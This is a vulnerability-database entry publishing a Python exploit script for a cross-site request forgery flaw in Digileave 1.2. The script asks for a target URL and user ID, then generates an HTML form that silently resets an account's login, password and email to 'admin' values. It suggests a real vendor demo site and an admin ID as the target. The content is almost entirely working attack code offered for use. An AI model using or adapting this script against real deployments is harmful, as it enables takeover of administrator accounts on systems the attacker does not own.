Digileave 1.2Cross-Site Request Forgery (Update Admin)

2017.09.18
Credit: Ihsan Sencan
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

#!/usr/local/bin/python # # # # # # Exploit Title: Digileave 1.2 - Cross-Site Request Forgery (Update User & Admin) # Dork: N/A # Date: 18.09.2017 # Vendor Homepage: http://www.digiappz.com/ # Software Link: http://www.digiappz.com/digileave.asp?id=1 # Demo: http://www.digiappz.com/digileave/login.asp # Version: 1.2 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # import os import urllib if os.name == 'nt': os.system('cls') else: os.system('clear') def csrfexploit(): e_baslik = ''' ################################################################################ ______ _______ ___ _ __ _____ _______ ___________ _ __ / _/ / / / ___// | / | / / / ___// ____/ | / / ____/ | / | / / / // /_/ /\__ \/ /| | / |/ / \__ \/ __/ / |/ / / / /| | / |/ / _/ // __ /___/ / ___ |/ /| / ___/ / /___/ /| / /___/ ___ |/ /| / /___/_/ /_//____/_/ |_/_/ |_/ /____/_____/_/ |_/\____/_/ |_/_/ |_/ WWW.IHSAN.NET ihsan[@]ihsan.net + Digileave 1.2 - CSRF (Update Admin) ################################################################################ ''' print e_baslik url = str(raw_input(" [+] Enter The Target URL (Please include http:// or https://) \n Demo Site:http://digiappz.com/digileave: ")) id = raw_input(" [+] Enter The User ID \n (Demo Site Admin ID:8511): ") csrfhtmlcode = ''' <html> <body> <form method="POST" action="%s/user_save.asp" name="user"> <table border="0" align="center"> <tbody><tr> <td valign="middle"> <table border="0" align="center"> <tbody><tr> <td bgcolor="gray" align="center"> <table width="400" cellspacing="1" cellpadding="2" border="0"> <tbody><tr> <td colspan="2" bgcolor="cream" align="left"> <font color="red">User Update</font> </td> </tr> <tr> <td> <font><b>Choose Login*</b></font> </td> <td> <input name="login" size="30" value="admin" type="text"> </td> </tr> <tr> <td> <font><b>Choose Password*</b></font> </td> <td> <input name="password" size="30" value="admin" type="text"> </td> </tr> <tr> <td> <font><b>First Name*</b></font> </td> <td> <input name="first_name" size="30" value="admin" type="text"> </td> </tr> <tr> <td> <font><b>Last Name*</b></font> </td> <td> <input name="last_name" size="30" value="admin" type="text"> </td> </tr> <tr> <td> <font><b>Email*</b></font> </td> <td> <input name="email" size="30" value="admin@admin.com" onblur="emailvalid(this);" type="text"> </td> </tr> <tr> <td colspan="2" align="center"> <input name="id" value="%s" type="hidden"> <input value="Update" onclick="return check()" type="submit"> </td> </tr> </tbody></table> </td> </tr> </tbody></table> </td> </tr> </tbody></table> </form> ''' %(url, id) print " +----------------------------------------------------+\n [!] The HTML exploit code for exploiting this CSRF has been created." print(" [!] Enter your Filename below\n Note: The exploit will be saved as 'filename'.html \n") extension = ".html" name = raw_input(" Filename: ") filename = name+extension file = open(filename, "w") file.write(csrfhtmlcode) file.close() print(" [+] Your exploit is saved as %s")%filename print("") csrfexploit()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top